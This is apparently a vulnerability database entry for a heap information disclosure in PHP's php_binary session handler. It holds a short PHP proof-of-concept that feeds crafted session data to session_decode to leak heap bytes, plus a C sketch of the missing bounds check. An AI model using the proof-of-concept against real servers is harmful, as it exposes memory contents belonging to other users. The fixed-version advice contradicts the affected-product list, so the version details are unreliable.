Info
Last Modified: about 1 year ago

Keywords
HPSBMA02215, SSRT071423

Description
The php_binary serialization handler in the PHP session extension is missing a boundary check, which may lead to unauthorized information disclosure. The condition is triggered during the extraction of an overly long variable name from php_binary session data, which will disclose up to 126 bytes of heap data into PHP variables, resulting in a loss of confidentiality.

Classification
Location: Remote/Network Access Required
Attack Type: Information Disclosure
Impact: Loss of Confidentiality
Exploit: Exploit Available
Disclosure: OSVDB Verified
OSVDB: Concern

Technical
The php_binary session data format contains one entry per serialized variable. Every entry contains:
- a one-byte size field containing the length of the variable name
- the variable name
- the serialized data
------------ Exploit Code ------------
<?php
die("REMOVE THIS LINE");

ini_set("session.serialize_handler", "php_binary");
session_start();

$x = chr(36).str_repeat("A", 36)."N;".chr(127);
$data = $x;

session_decode($data);

$keys = array_keys($_SESSION);
$heapdump = $keys[1];

// code for reading from $heapdump goes here
?>
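
The name-length check that the description says is missing, sketched as an added C example (not PHP's own source and not part of the original entry). check_entry_name() and build_sample() are hypothetical helpers; the sample bytes are constructed to mirror the session string shown above, and only the one-byte length field described in this entry is modelled.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Read one php_binary entry header at offset `off` in a buffer of `len` bytes.
 * Layout (per the description above): 1 size byte, then that many name bytes,
 * then the serialized value. Returns the offset of the serialized value, or -1
 * if the size byte claims more name bytes than the buffer still holds.
 * check_entry_name() is a hypothetical helper, not a PHP API. */
static long check_entry_name(const unsigned char *buf, size_t len, size_t off,
                             size_t *name_len)
{
    if (off >= len)
        return -1;                       /* no size byte to read */
    size_t claimed = buf[off];
    size_t remaining = len - off - 1;    /* bytes after the size byte */
    if (claimed > remaining)
        return -1;                       /* name would run past end of data */
    *name_len = claimed;
    return (long)(off + 1 + claimed);
}

/* Constructed sample mirroring the session string on this page:
 * chr(36) . 36 x "A" . "N;" . chr(127). Fills `out` (>= 40 bytes). */
static size_t build_sample(unsigned char *out)
{
    out[0] = 36;
    memset(out + 1, 'A', 36);
    out[37] = 'N';
    out[38] = ';';
    out[39] = 127;
    return 40;
}

int main(void)
{
    unsigned char buf[40];
    size_t len = build_sample(buf), n = 0;
    long v = check_entry_name(buf, len, 0, &n);
    printf("entry 1: value at %ld, name length %zu\n", v, n);
    /* "N;" (serialized NULL) is 2 bytes, so the next entry starts at v + 2. */
    long w = check_entry_name(buf, len, (size_t)v + 2, &n);
    printf("entry 2: %s\n", w < 0 ? "rejected, name exceeds buffer" : "accepted");
    return 0;
}
```

The first entry passes because its 36-byte name fits in the buffer; the second is rejected because its size byte claims 127 name bytes when none remain.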

Solution
Upgrade to PHP versions 4.4.5 or higher and PHP 5.2.1 or higher, as they have been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Products
PHP
- 4.0 Beta 1
- 4.0 Beta 2
- 4.0 Beta 3
- 4.0 Beta 4
- 4.0.x
- 4.1.x
- 4.2.x
- 4.4.0
- 4.4.2
- 4.4.1
- 4.3.x
- 5.0.x
- 4.4.3
- 5.2.0
- 5.2.1
- 4.4.5
- 4.4.6
- 4.4.4
- 5.1.x
- 5.0 Release Candidate 3
- 5.0 Release Candidate 2
- 5.0 Release Candidate 1
- 5.0 Beta 4
- 5.0 Beta 3
- 5.0 Beta 2
- 5.0 Beta 1
- 4.0, Release Candidate 2
- 4.0, Release Candidate 1
- 3.x

Credit
- Stefan Esser - sesser
hardened-php.net - www.hardened-php.net